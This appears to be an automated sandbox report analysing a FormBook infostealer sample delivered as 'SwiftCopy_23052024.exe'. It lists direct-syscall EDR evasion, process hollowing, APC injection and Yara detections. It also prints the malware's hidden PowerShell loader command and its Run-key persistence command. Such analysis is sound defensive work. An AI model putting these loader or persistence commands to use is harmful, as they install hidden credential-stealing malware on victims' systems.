Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225209AD mov eax, dword ptr fs:[00000030h] 18_2_225209AD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225209AD mov eax, dword ptr fs:[00000030h] 18_2_225209AD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F2E4F mov eax, dword ptr fs:[00000030h] 18_2_225F2E4F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F2E4F mov eax, dword ptr fs:[00000030h] 18_2_225F2E4F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526E71 mov eax, dword ptr fs:[00000030h] 18_2_22526E71
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A0E7F mov eax, dword ptr fs:[00000030h] 18_2_225A0E7F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A0E7F mov eax, dword ptr fs:[00000030h] 18_2_225A0E7F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A0E7F mov eax, dword ptr fs:[00000030h] 18_2_225A0E7F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22518E1D mov eax, dword ptr fs:[00000030h] 18_2_22518E1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov ecx, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6E20 mov eax, dword ptr fs:[00000030h] 18_2_225B6E20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6E20 mov eax, dword ptr fs:[00000030h] 18_2_225B6E20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6E20 mov ecx, dword ptr fs:[00000030h] 18_2_225B6E20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558EF5 mov eax, dword ptr fs:[00000030h] 18_2_22558EF5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526EE0 mov eax, dword ptr fs:[00000030h] 18_2_22526EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526EE0 mov eax, dword ptr fs:[00000030h] 18_2_22526EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526EE0 mov eax, dword ptr fs:[00000030h] 18_2_22526EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526EE0 mov eax, dword ptr fs:[00000030h] 18_2_22526EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251AE90 mov eax, dword ptr fs:[00000030h] 18_2_2251AE90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251AE90 mov eax, dword ptr fs:[00000030h] 18_2_2251AE90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251AE90 mov eax, dword ptr fs:[00000030h] 18_2_2251AE90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22552E9C mov eax, dword ptr fs:[00000030h] 18_2_22552E9C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22552E9C mov ecx, dword ptr fs:[00000030h] 18_2_22552E9C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225BAEB0 mov eax, dword ptr fs:[00000030h] 18_2_225BAEB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225BAEB0 mov eax, dword ptr fs:[00000030h] 18_2_225BAEB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225ACEA0 mov eax, dword ptr fs:[00000030h] 18_2_225ACEA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225ACEA0 mov eax, dword ptr fs:[00000030h] 18_2_225ACEA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225ACEA0 mov eax, dword ptr fs:[00000030h] 18_2_225ACEA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h] 18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h] 18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h] 18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h] 18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h] 18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h] 18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CF50 mov eax, dword ptr fs:[00000030h] 18_2_2255CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225C0F50 mov eax, dword ptr fs:[00000030h] 18_2_225C0F50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A4F40 mov eax, dword ptr fs:[00000030h] 18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A4F40 mov eax, dword ptr fs:[00000030h] 18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A4F40 mov eax, dword ptr fs:[00000030h] 18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A4F40 mov eax, dword ptr fs:[00000030h] 18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4F68 mov eax, dword ptr fs:[00000030h] 18_2_225F4F68
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AF69 mov eax, dword ptr fs:[00000030h] 18_2_2254AF69
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AF69 mov eax, dword ptr fs:[00000030h] 18_2_2254AF69
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22522F12 mov eax, dword ptr fs:[00000030h] 18_2_22522F12
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtWriteVirtualMemory: Direct from: 0x77762E3C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtMapViewOfSection: Direct from: 0x77762D1C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtNotifyChangeKey: Direct from: 0x77763C2C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtCreateMutant: Direct from: 0x777635CC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtResumeThread: Direct from: 0x777636AC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtProtectVirtualMemory: Direct from: 0x77757B2E Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtQuerySystemInformation: Direct from: 0x77762DFC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtReadFile: Direct from: 0x77762ADC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtDelayExecution: Direct from: 0x77762DDC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtWriteVirtualMemory: Direct from: 0x7776490C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtQueryInformationProcess: Direct from: 0x77762C26 Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtResumeThread: Direct from: 0x77762FBC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtCreateUserProcess: Direct from: 0x7776371C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtSetInformationThread: Direct from: 0x777563F9 Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtAllocateVirtualMemory: Direct from: 0x77763C9C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtQueryAttributesFile: Direct from: 0x77762E6C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtReadVirtualMemory: Direct from: 0x77762E8C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtQuerySystemInformation: Direct from: 0x777648CC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtAllocateVirtualMemory: Direct from: 0x777648EC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtOpenSection: Direct from: 0x77762E0C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtAllocateVirtualMemory: Direct from: 0x77762BEC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtCreateFile: Direct from: 0x77762FEC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtOpenFile: Direct from: 0x77762DCC Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtOpenKeyEx: Direct from: 0x77762B9C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtSetInformationProcess: Direct from: 0x77762C5C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtTerminateProcess: Direct from: 0x77762D5C Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtProtectVirtualMemory: Direct from: 0x77762F9C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: NULL target: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: NULL target: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: NULL target: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\wlanext.exe Thread APC queued: target process: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section unmapped: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe base: 1660000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe base: 19FFF4 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)" Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Process created: C:\Windows\SysWOW64\Magnify.exe "C:\Windows\SysWOW64\Magnify.exe" Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$lommeregnerens178=get-content 'c:\users\user\appdata\roaming\fertiliseringer\forbrug\venstrehaandsarbejdet.uns';$industrivirksomhederne=$lommeregnerens178.substring(7349,3);.$industrivirksomhederne($lommeregnerens178)"
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%jordbesiddere% -windowstyle minimized $udslettelser=(get-itemproperty -path 'hkcu:\oplukkelig\').bractlets52;%jordbesiddere% ($udslettelser)"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$lommeregnerens178=get-content 'c:\users\user\appdata\roaming\fertiliseringer\forbrug\venstrehaandsarbejdet.uns';$industrivirksomhederne=$lommeregnerens178.substring(7349,3);.$industrivirksomhederne($lommeregnerens178)" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%jordbesiddere% -windowstyle minimized $udslettelser=(get-itemproperty -path 'hkcu:\oplukkelig\').bractlets52;%jordbesiddere% ($udslettelser)" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403248

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
